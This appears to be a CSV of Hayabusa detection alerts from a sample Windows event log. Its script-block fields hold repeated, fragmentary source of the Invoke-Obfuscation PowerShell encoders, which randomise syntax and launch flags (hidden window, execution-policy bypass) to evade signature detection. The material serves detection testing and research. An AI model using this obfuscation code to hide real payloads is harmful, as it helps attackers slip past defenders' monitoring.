.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. 
$DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. 
$Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' $RandomConversionSyntax += (""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"") $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Va",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"riable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.254 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"riable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedHexCommand { <# .SYNOPSIS Generates hexadecimal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedHexCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedHexCommand encodes an input PowerShell scriptblock or path as a hexadecimal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInt -NoPr ""('57_72}69R74u65P2dR48T6fu73_74;20_27R48T65R6cR6c;6fT20;57}6fP72}6cT64u21;27}20}2dP46T6f}72u65{67T72}6f_75}6e{64P43_6f_6cR6f{72u20;47T72{65T65}6eT3b}20T57_72P69u74u65P2dT48T6fR73;74;20P27T4fu62;66P75{73R63}61}74{69R6fu6eT20T52u6fT63u6b;73u21;27}20;2d;46R6fT72T65P67P72R6fP75{6e}64T43_6fP6cR6f{72;20T47T72T65{65}6e'-SPLiT'P'-SpliT'}'-SPLIt 'u'-SpLIt'{'-SPLit'R' -SplIT '_'-SpliT'T' -SplIt';'| ForEach-Object { ([Convert]::ToInt16(( $_.ToString()),16)-AS[Char]) }) -Join ''|Invoke-Expression"" C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join (( 57,72 , 69 , 74 , 65, '2d', 48, '6f', 73 ,74, 20, 27 ,48, 65, '6c', '6c','6f', 20,57 , '6f',72,'6c' , 64 ,21 , 27 , 20 ,'2d', 46,'6f', 72 ,65 ,67, 72, '6f', 75 ,'6e', 64 ,43,'6f' , '6c' ,'6f' , 72,20 ,47 , 72 , 65, 65,'6e','3b', 20, 57 ,72,69 ,74 ,65,'2d',48 ,'6f' ,73, 74 ,20 , 27,'4f' ,62, 66,75 , 73 ,63 ,61 ,74 , 69 , '6f' , '6e', 20,52 , '6f',63 , '6b' , 73,21,27 , 20, '2d' ,46 ,'6f', 72,65 ,67, 72 ,'6f' ,75 ,'6e' , 64 , 43,'6f' ,'6c' , '6f' , 72 ,20, 47,72,65 , 65, '6e') |ForEach-Object{ ([Char]([Convert]::ToInt16( ([String]$_) ,16))) })|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 16 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . 
